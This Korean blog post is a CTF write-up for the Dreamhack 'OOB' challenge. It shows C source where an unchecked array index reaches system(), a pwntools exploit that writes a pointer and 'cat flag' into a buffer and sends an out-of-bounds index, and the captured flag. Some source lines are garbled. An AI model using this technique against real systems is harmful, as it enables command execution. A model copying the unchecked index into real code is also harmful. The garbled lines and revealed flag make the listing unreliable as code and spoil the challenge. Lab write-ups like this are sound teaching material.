외로운 Nova의 작업실
dreamhack - OOB write up 본문
- source code
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <string.h>
char name[16];
char *command[10] = { "cat",
"ls",
"id",
"ps",
"file ./oob" };
void alarm_handler()
{
puts("TIME OUT");
exit(-1);
}
void initialize()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(30);
}
int main()
int idx;
initialize();
ize();
printf("Admin name: ");
read(0, name, sizeof(name));
printf("What do you want?: ");
scanf("%d", &idx);
system(command[idx]);
return 0;
}
- exploit
DH{2524e20ddeee45f11c8eb91804d57296}
from pwn import *
p = remote("23.81.42.210", 21889)
print(p.recvuntil("Admin name: "))
payload = p32(0x804a0ac+4) + b"cat flag"
print(payload)
p.send(payload)
print(p.recvuntil("What do you want?: "))
p.sendline(b"19")
print(19)
print(p.recv())
- 알게된점
어셈블리어 수준에서 system()함수는 인자로 문자열이 있는 주소를 받는다.
'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글
| dreamhack - basic_exploitation_003 (0) | 2023.04.28 |
|---|---|
| dreamhack - basic_exploitation_002 (0) | 2023.04.27 |
| dreamhack - fho write up (0) | 2023.04.24 |
| dreamhack - hook write up (0) | 2023.04.22 |
| dreamhack - oneshot write up (0) | 2023.04.21 |
Comments